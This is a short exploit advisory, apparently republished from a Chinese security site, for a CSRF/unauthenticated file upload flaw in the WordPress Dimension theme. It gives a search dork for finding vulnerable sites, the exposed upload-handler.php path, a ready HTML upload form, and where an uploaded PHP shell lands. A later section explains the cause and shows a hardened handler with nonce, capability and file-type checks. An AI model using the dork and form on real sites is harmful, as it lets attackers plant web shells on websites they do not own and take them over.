
WordPress Dimension theme CSRF flaw

2013-11-22 12:15

#Title : WordPress Dimension Themes CSRF File Upload Vulnerability

#Author : DevilScreaM

#Type : Web Applications

#Language : PHP

#Vendor : http://themeforest.net

#Download : http://themeforest.net/item/dimension-retina-responsive-multipurpose-theme/

#Tested on : Mozilla, Chrome, Opera -> Windows & Linux

#Vulnerability : CSRF

#Keywords :

inurl:wp-content/themes/dimension


CSRF file upload
 
Exploit & POC :
 
http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php
 
Script :
 
<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
 
 
File Access :
 
http://site-target/uploads/[years]/[month]/your_shell.php
 
Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
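The root cause is a theme-level upload endpoint that accepts a multipart POST from anyone, with no request token and no file-type restriction, so a page on another site can submit the form above on a visitor's behalf. The following is an added example of what a hardened replacement for such a handler looks like; it is not the Dimension theme's code. It keeps the advisory's field name "uploadfile", while the nonce action "dimension_upload" and the wp-load.php path are assumptions.

```php
<?php
// Added example (not the Dimension theme's own code): a hardened replacement for a
// theme-level upload-handler.php. The field name "uploadfile" comes from the advisory;
// the nonce action "dimension_upload" is an assumed placeholder.

// Load WordPress so the nonce, capability and upload helpers are available.
// Assumes this file lives in wp-content/themes/<theme>/library/includes/.
require_once dirname( __FILE__ ) . '/../../../../../wp-load.php';

function dimension_secure_upload_handler() {
    // 1. Only authenticated users who may upload files can reach the handler at all.
    if ( ! is_user_logged_in() || ! current_user_can( 'upload_files' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }

    // 2. CSRF defence: the request must carry a nonce bound to this user and action.
    //    A form hosted on another site cannot obtain a valid one.
    $nonce = isset( $_POST['_wpnonce'] ) ? $_POST['_wpnonce'] : '';
    if ( ! wp_verify_nonce( $nonce, 'dimension_upload' ) ) {
        wp_die( 'Invalid request token', '', array( 'response' => 403 ) );
    }

    // 3. Require a real multipart upload in the expected field.
    if ( empty( $_FILES['uploadfile'] ) || $_FILES['uploadfile']['error'] !== UPLOAD_ERR_OK ) {
        wp_die( 'No file uploaded', '', array( 'response' => 400 ) );
    }

    // 4. Restrict to the image types the theme needs. wp_check_filetype_and_ext()
    //    checks both extension and content, so a .php file is refused.
    $allowed = array( 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif' );
    $file    = $_FILES['uploadfile'];
    $check   = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $allowed );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_die( 'File type not allowed', '', array( 'response' => 415 ) );
    }

    // 5. Let core move the file: it re-applies the allow-list, sanitises the name and
    //    stores it under wp-content/uploads/YYYY/MM rather than trusting the client.
    $result = wp_handle_upload( $file, array( 'test_form' => false, 'mimes' => $allowed ) );
    if ( isset( $result['error'] ) ) {
        wp_die( esc_html( $result['error'] ), '', array( 'response' => 400 ) );
    }

    wp_send_json_success( array( 'url' => $result['url'] ) );
}

dimension_secure_upload_handler();
```

The submitting form must include wp_nonce_field( 'dimension_upload' ) for step 2 to pass. In a real theme, registering the handler as a wp_ajax_ action through admin-ajax.php is preferable to loading wp-load.php directly from a theme file.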

 

Source: www.2cto.com/Article/201311/259177.html
